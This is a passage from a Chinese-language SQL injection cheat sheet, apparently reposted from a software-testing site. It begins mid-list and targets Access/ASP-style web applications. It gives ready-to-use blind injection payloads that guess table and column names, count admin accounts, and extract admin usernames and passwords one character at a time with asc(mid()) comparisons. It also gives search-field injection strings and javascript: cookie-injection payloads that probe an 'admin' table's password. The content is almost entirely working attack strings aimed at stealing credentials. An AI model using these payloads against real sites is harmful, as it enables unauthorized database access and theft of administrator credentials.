2、猜解列名:
and (select count(列名) from 表名)<>0
3、猜解管理员用户个数:
and (select count(*) from 表名)=1
返回正常,表中有一条记录。
4、猜解管理员用户名的长度:
and (select len(列名) from 表名)>=1、>=2、>=3、>=4。
5、猜解管理员用户名:
and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0
最后提交:
and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理员的密码:
按照上面的原理,只要把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到管理员的密码了。
搜索型注入漏洞利用猜解语句:
关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='%
将and 1=1 换成注入语句就可以了。
cookie注入语句:
javascrīpt:alert(document.cookie="id="+escape("44 and 1=1"));
javascrīpt:alert(document.cookie="id="+escape("44 and 1=2"));
猜解语句:
猜解长度:
javascrīpt:alert(document.cookie="id="+escape("44 and (select len(password) from admin)=16"))
猜解内容:
javascrīpt:alert(document.cookie="id="+escape("44 and (select asc(mid(username)) from admin)=97"))
//
文章来源于领测软件测试网 https://www.ltesting.net/